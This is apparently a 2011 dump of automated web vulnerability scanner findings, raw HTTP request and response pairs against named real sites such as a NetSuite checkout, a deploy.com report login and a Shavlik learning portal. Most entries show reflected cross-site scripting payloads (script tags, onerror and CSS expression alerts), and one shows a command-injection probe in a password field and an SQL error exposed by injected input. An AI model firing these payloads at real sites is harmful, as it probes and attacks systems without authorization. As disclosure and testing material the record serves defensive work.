HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A16F926F5 ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Mon, 25 Apr 2011 14:23:18 GMT Connection: close if(typeof __ADXPOSE_CONTAINERS__=== ...[SNIP]... _LOG_EVENT__("000_000_3" ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://an.yandex.ru |
Path: | /code/47934 |
GET /code/47934?rnd=33486 Host: an.yandex.ru Proxy-Connection: keep-alive Referer: http://www.trucklist.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yandexuid=1981869761 |
HTTP/1.1 403 Forbidden Date: Mon, 25 Apr 2011 14:47:53 GMT Server: Phantom/0.0.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Last-Modified: Mon, 25 Apr 2011 14:47:53 GMT Expires: Mon, 25 Apr 2011 14:47:53 GMT Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=windows-1251 Content-Length: 67 <!-- Bad partner/domain for page 47934 (0, de788(a)f60c8b163e7) --> |
Severity: | High |
Confidence: | Firm |
Host: | http://an.yandex.ru |
Path: | /code/57617 |
GET /code/57617?rnd=29605 Host: an.yandex.ru Proxy-Connection: keep-alive Referer: http://webalta.ru/news User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yandexuid=1981869761 |
HTTP/1.1 403 Forbidden Date: Mon, 25 Apr 2011 14:22:57 GMT Server: Phantom/0.0.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Last-Modified: Mon, 25 Apr 2011 14:22:57 GMT Expires: Mon, 25 Apr 2011 14:22:57 GMT Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=windows-1251 Content-Length: 67 <!-- Bad partner/domain for page 57617 (0, 2ff26(a)615e8e384bf) --> |
Severity: | High |
Confidence: | Firm |
Host: | http://an.yandex.ru |
Path: | /code/66894 |
GET /code/66894?rnd=148599 Host: an.yandex.ru Proxy-Connection: keep-alive Referer: http://pogoda.webalta.ru/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yandexuid=1981869761 |
HTTP/1.1 403 Forbidden Date: Mon, 25 Apr 2011 14:24:47 GMT Server: Phantom/0.0.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Last-Modified: Mon, 25 Apr 2011 14:24:47 GMT Expires: Mon, 25 Apr 2011 14:24:47 GMT Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=windows-1251 Content-Length: 66 <!-- Bad partner/domain for page 66894 (0, ad56b(a)20328a529f) --> |
Severity: | High |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /b/rc.pli |
GET /b/rc.pli?func=COMSCORE Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:31:28 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 83 COMSCORE.BMX.Broker |
Severity: | High |
Confidence: | Certain |
Host: | https://checkout.netsuite |
Path: | /core/ |
GET /core/?21856'%20style%3dx Referer: https://checkout.netsuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=B5nHN1Gc4 Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:05:45 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -110531729:616363742 Set-Cookie: JSESSIONID=VXMTN1NJZ Set-Cookie: NLShopperId=rcHW8495 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2422 <html> <head> <title>Checkout</title> <link rel='stylesheet' href='/core/styles ...[SNIP]... <a href='/s.nl?alias=core&21856\' style=x:expression(alert ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://checkout.netsuite |
Path: | /core/ |
GET /core/?8226f\'%3balert(1)/ Referer: https://checkout.netsuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=B5nHN1Gc4 Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:05:57 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -704362580:616363742 Set-Cookie: JSESSIONID=byykN1NVD Set-Cookie: NLShopperId=rcHW8495 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2338 <html> <head> <title>Checkout</title> <link rel='stylesheet' href='/core/styles ...[SNIP]... <script language='Javascript' type='text/javascript' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://checkout.netsuite |
Path: | /s.nl/c.438708/n.1/sc.4/ |
GET /s.nl/c.438708f2ecd'%20style%3dx Host: checkout.netsuite.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=1J6WN1GLD |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:29:37 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 2000712853:616363742 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Keep-Alive: timeout=10, max=968 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 2020 <html> <head> <title>Checkout</title> <link rel='stylesheet' href='/core/styles ...[SNIP]... <a href='/s.nl?c=438708f2ecd\' style=x:expression(alert ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://checkout.netsuite |
Path: | /s.nl/c.438708/n.1/sc.4/ |
GET /s.nl/c.438708/n.133c23'%20style%3dx Host: checkout.netsuite.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=1J6WN1GLD |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:31:29 GMT Server: Apache Cache-Control: No-Cache,no-store Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 333369207:616363742D X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Keep-Alive: timeout=10, max=982 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 2020 <html> <head> <title>Checkout</title> <link rel='stylesheet' href='/core/styles ...[SNIP]... <a href='/s.nl?c=438708&n=133c23\' style=x:expression(alert ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://customer.kronos |
Path: | /default.asp |
GET /default.asp?rurl=%2Fuser Host: customer.kronos.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1306330437105%26vn |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:25:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 17417 Content-Type: text/html Expires: Tue, 01 Jan 1980 06:00:00 GMT Set-Cookie: ICRedirect=Url=rurl%3D Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <SCRIPT language="JavaScript"> <!-- function verify(url) { if (confirm("Are you sure?")) { window.location = url; } ...[SNIP]... <INPUT type="hidden" name="rurl" value="/user/managef ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://demr.opt.fimserve |
Path: | /adopt/ |
GET /adopt/?r=h&l=999e4367 Host: demr.opt.fimserve.com Proxy-Connection: keep-alive Referer: http://www.ripoffreport User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pfuid=ClIoKE2reZYP |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 16:09:28 GMT Content-Type: text/html;charset=ISO Connection: keep-alive P3P: policyref="http://www Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 179 Server: ASP/0.0.0.0/0.7.61 <script language='Javascript'> _sdc_loaded=true; _sdc_error=true; _sdc_loc_ext_id='999e4367 _sdc_sz='300x25019ac4';alert(1)/ </script> |
Severity: | High |
Confidence: | Certain |
Host: | http://desk.opt.fimserve |
Path: | /adopt/ |
GET /adopt/?r=h&l=999e4367 Host: desk.opt.fimserve.com Proxy-Connection: keep-alive Referer: http://www.ripoffreport User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pfuid=ClIoKE2reZYP |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 25 Apr 2011 16:14:40 GMT Content-Type: text/html;charset=ISO Connection: keep-alive P3P: policyref="http://www Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 179 <script language='Javascript'> _sdc_loaded=true; _sdc_error=true; _sdc_loc_ext_id='999e4367 _sdc_sz='160x60040f29';alert(1)/ </script> |
Severity: | High |
Confidence: | Certain |
Host: | http://ds.addthis.com |
Path: | /red/psi/sites/www.kronos |
GET /red/psi/sites/www.kronos Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 13:51:39 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 13:51:39 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 25 Apr 2011 13:51:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 25 Apr 2011 13:51:39 GMT Connection: close _ate.ad.hprcaea3<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /event.flow |
GET /event.flow?eventcode=000 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: evlu=8046e9fe-2ba6-4040 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=79DACCAB1 Cache-Control: no-store Content-Type: text/javascript;charset Content-Length: 145 Date: Mon, 25 Apr 2011 14:23:59 GMT Connection: close if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__( |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/ |
GET /hmc/report/?'"--></style User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e306b860 Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:42:10 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:42:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... </script>e3cac<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/ |
GET /hmc/report/?955ef"><script>alert(1)< Host: hourly.deploy.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 13:39:32 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: JSESSIONID=d830da383 Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:39:32 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 4880 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/ |
GET /hmc/report/?nsextt='%22- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:41 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/ |
GET /hmc/report/?register=1e7121"><script>alert(1)< Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:30 GMT Server: Apache/2.0.46 (Red Hat) Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:30 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm |
GET /hmc/report/index.cfm?'"- Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e306b860 Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:42:07 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:42:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... </script>e83be<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm |
POST /hmc/report/index.cfm? HTTP/1.1 Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: hourly.deploy.com Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 63 j_password=%26ping%20-c |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:42:03 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: JSESSIONID=3e302c38d Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:42:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="Smith7fe1a"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm |
GET /hmc/report/index.cfm?j Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:32 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:32 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm |
GET /hmc/report/index.cfm?3979a"><script>alert(1)< Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:33 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm |
GET /hmc/report/index.cfm Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:43 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm |
GET /hmc/report/index.cfm Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:31 GMT Server: Apache/2.0.46 (Red Hat) Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm/ |
GET /hmc/report/index.cfm/ Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e306b860 Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:42:10 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:42:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm/ |
GET /hmc/report/index.cfm/ Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e306b860 Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:42:11 GMT Server: Apache/2.0.46 (Red Hat) Set-Cookie: CFAUTHORIZATION_hmc5_prod Set-Cookie: CFAUTHORIZATION_hmc5_prod Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:42:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... <form name="form1" action="/hmc/report/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /ab |
GET /ab?enc=zczMzMzMCEDN Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChIIm4sBEAoYASAB |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfu=8fG5+^ErkX00s]# Date: Mon, 25 Apr 2011 14:24:28 GMT Content-Length: 1529 document.write('<scr' + 'ipt language=\"Javascript\">< ...[SNIP]... r0bSsYda6b2ziUhg7VNA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://kronos.tt.omtrdc |
Path: | /m2/kronos/mbox/standard |
GET /m2/kronos/mbox/standard Host: kronos.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.kronos.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 216 Date: Mon, 25 Apr 2011 13:56:09 GMT Server: Test & Target mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://kroogy.com |
Path: | /favicon.ico |
GET /favicon.ico286d0<img%20src%3da Host: kroogy.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: nscriptinfo=75cb7e9c |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 13:39:10 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 X-Powered-By: PleskLin Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2134 <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: ...[SNIP]... <strong>Favicon.ico286d0<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.shavlik.com |
Path: | /shavlik/index.cfm |
GET /shavlik/index.cfm?m=521 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631 |
HTTP/1.1 200 OK Connection: close Date: Mon, 25 Apr 2011 12:47:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 ...[SNIP]... <!-- 041f63--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.shavlik.com |
Path: | /shavlik/index.cfm |
GET /shavlik/index.cfm?m= User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: learn.shavlik.com Cookie: CFID=799689; CFTOKEN=67476078 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 25 Apr 2011 12:26:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8 ...[SNIP]... <font style="COLOR: black; FONT: 8pt/11pt verdana"> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '29f68<img src=a onerror=alert(1) ' at line 7 </font> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
